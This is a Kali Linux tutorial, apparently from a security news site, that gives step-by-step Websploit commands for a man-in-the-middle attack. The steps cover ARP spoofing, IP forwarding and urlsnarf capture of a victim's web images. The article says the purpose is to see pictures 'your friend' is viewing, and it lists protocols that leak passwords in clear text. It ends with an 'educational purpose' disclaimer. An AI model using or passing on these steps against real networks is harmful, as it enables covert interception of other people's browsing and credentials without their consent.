In this article, we can launch a MITM attack with Websploit and the Driftnet Tool – URLSnarf used to capture images.
MITM attack is a type of cyber attack where the attacker intercepts communication between two parties.
Step 1: Need to install Websploit in Kali if not present.
root@kali:~# apt-get install websploit
Step2: To Run the websploit
root@kali:~# websploit
Step 3: Next we need to list the modules with the websploit.
wsf > show modules
Step 4: Need to select network/mitm under Network modules.
wsf > use network/mitm
wsf:MITM > show options
Interface: Need to specify the network adapter interface based on our network adapter.
- set Interface eth0
- set Interface wlan0
Router: Need to specify Router IP, which can be found with the command route -n.
set Router (Gateway IP)
Target: The victim machine IP address, can be found with ipconfig for Windows and ifconfig for Linux.
Step 5: All set now time to run the sniffer, once you run the sniffer IP Forwarding and ARP Spoofing occur after that sniffers will start up.
wsf:MITM > run
Step 6: Now go down to the victim machine and start surfing, all the images would be captured by urlsnarf.
Here you can find the pictures that your friend watching online.
Protocols Vulnerable to Sniffing
- HTTP: Sends passwords in clear text
- TELNET: Transfer commands in plain text
- SNMP: Sends passwords in clear text
- POP: Sends passwords in clear text
- FTP: Sends passwords in clear text
- NNTP: Sends passwords in clear text
- IMAP: Sends passwords in clear text
If you have any doubt please don’t hesitate to leave a comment.
Also, find more Tutorials with Kali Linux
- MITM attack over HTTPS connection with SSLStrip.
- Sniffing is
- as easy as possible with Ettercap.
- Driftnet – Tool used to capture images that your friend looking at Online.
Disclaimer
This article is only for an Educational purpose. Any actions and or activities related to the material contained on this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and www.gbhackers.com will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.